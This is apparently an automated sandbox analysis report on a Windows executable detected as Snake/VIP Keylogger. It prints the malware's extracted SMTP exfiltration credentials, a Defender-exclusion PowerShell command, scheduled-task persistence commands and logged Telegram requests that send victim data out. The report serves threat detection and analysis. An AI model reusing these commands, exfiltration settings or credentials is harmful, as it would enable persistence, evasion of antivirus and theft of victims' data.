

Windows Analysis Report
Company introduction.exe

Overview

General Information

Sample name: Company introduction.exe
Analysis ID: 1591636
MD5: 10f72e53a2c9f106093c233b56a3a819
SHA1: e8a63836ff90493559b69a1bc6d6080ba9370a99
SHA256: 84e892d4627a3a3aa053b30200788bd6942c046d2dadcf5121017a32e10142f2
Tags: exe, MassLogger, RFQ, user-cocaman

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Company introduction.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\Company introduction.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
    • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Company introduction.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\Company introduction.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
  • FzXKnGk.exe (PID: 7888 cmdline: C:\Users\user\AppData\Roaming\FzXKnGk.exe MD5: 10F72E53A2C9F106093C233B56A3A819)
    • schtasks.exe (PID: 8024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FzXKnGk.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
    • FzXKnGk.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Roaming\FzXKnGk.exe" MD5: 10F72E53A2C9F106093C233B56A3A819)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2e710:$a1: get_encryptedPassword
  • 0x2ec98:$a2: get_encryptedUsername
  • 0x2e383:$a3: get_timePasswordChanged
  • 0x2e49a:$a4: get_passwordField
  • 0x2e726:$a5: set_encryptedPassword
  • 0x31442:$a6: get_passwords
  • 0x317d6:$a7: get_logins
  • 0x3142e:$a8: GetOutlookPasswords
  • 0x30de7:$a9: StartKeylogger
  • 0x3172f:$a10: KeyLoggerEventArgs
  • 0x30e87:$a11: KeyLoggerEventArgsEventHandler
0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
7.2.FzXKnGk.exe.4405f58.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.FzXKnGk.exe.4405f58.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
7.2.FzXKnGk.exe.4405f58.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
7.2.FzXKnGk.exe.4405f58.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bea0:$a1: get_encryptedPassword
  • 0x2c428:$a2: get_encryptedUsername
  • 0x2bb13:$a3: get_timePasswordChanged
  • 0x2bc2a:$a4: get_passwordField
  • 0x2beb6:$a5: set_encryptedPassword
  • 0x2ebd2:$a6: get_passwords
  • 0x2ef66:$a7: get_logins
  • 0x2ebbe:$a8: GetOutlookPasswords
  • 0x2e577:$a9: StartKeylogger
  • 0x2eebf:$a10: KeyLoggerEventArgs
  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
7.2.FzXKnGk.exe.4405f58.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3946e:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38b11:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x38d6e:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3974d:$a5: \Kometa\User Data\Default\Login Data

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FzXKnGk.exe, ParentImage: C:\Users\user\AppData\Roaming\FzXKnGk.exe, ParentProcessId: 7888, ParentProcessName: FzXKnGk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp", ProcessId: 8024, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", ProcessId: 7700, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe", ProcessId: 7652, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Company introduction.exe", ParentImage: C:\Users\user\Desktop\Company introduction.exe, ParentProcessId: 7452, ParentProcessName: Company introduction.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp", ProcessId: 7700, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T08:39:05.771201+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:08.006925+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:09.261798+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:10.767027+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:12.063724+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:14.296041+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:14.542062+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49764 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:04.279464+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:05.257413+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:06.498360+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:06.607571+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:07.451354+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:08.704094+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:15.625059+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49766 | 149.154.167.220 | 443 | TCP
2025-01-15T08:39:17.808179+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49773 | 149.154.167.220 | 443 | TCP



                AV Detection

Source: Company introduction.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Avira: detection malicious, Label: HEUR/AGEN.1311126
Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 0.2.Company introduction.exe.4e575e0.3.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Virustotal: Detection: 29%
Source: Company introduction.exe | Virustotal: Detection: 29%
Source: Company introduction.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Joe Sandbox ML: detected
Source: Company introduction.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Company introduction.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: Company introduction.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 07E93F06h | 0_2_07E93F5E
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 017DF8E9h | 6_2_017DF631
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 017DFD41h | 6_2_017DFA88
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8DC51h | 6_2_05A8D9A8
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A831E0h | 6_2_05A82DBF
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A831E0h | 6_2_05A82DC8
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A831E0h | 6_2_05A8310E
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A82C19h | 6_2_05A82968
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8D7F9h | 6_2_05A8D550
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8CF49h | 6_2_05A8CCA0
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8D3A1h | 6_2_05A8D0F8
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8FAB9h | 6_2_05A8F810
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_05A80040
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_05A80853
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8F661h | 6_2_05A8F3B8
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A80D0Dh | 6_2_05A80B30
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A81697h | 6_2_05A80B30
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8EDB1h | 6_2_05A8EB08
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8F209h | 6_2_05A8EF60
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8E959h | 6_2_05A8E6B0
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8E0A9h | 6_2_05A8DE00
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_05A80673
Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 4x nop then jmp 05A8E501h | 6_2_05A8E258
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 0183F8E9h | 12_2_0183F631
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 0183FD41h | 12_2_0183FA88
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F60D0Dh | 12_2_06F60B30
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F61697h | 12_2_06F60B30
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F631E0h | 12_2_06F62DC8
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F62C19h | 12_2_06F62968
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6E959h | 12_2_06F6E6B0
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_06F60673
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6E501h | 12_2_06F6E258
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6E0A9h | 12_2_06F6DE00
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6F661h | 12_2_06F6F3B8
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6F209h | 12_2_06F6EF60
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6EDB1h | 12_2_06F6EB08
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6D3A1h | 12_2_06F6D0F8
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6CF49h | 12_2_06F6CCA0
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_06F60853
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_06F60040
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6FAB9h | 12_2_06F6F810
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6DC51h | 12_2_06F6D9A8
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F6D7F9h | 12_2_06F6D550
Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 4x nop then jmp 06F631E0h | 12_2_06F6310E

                Networking

                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49766 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49773 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.48.1:443
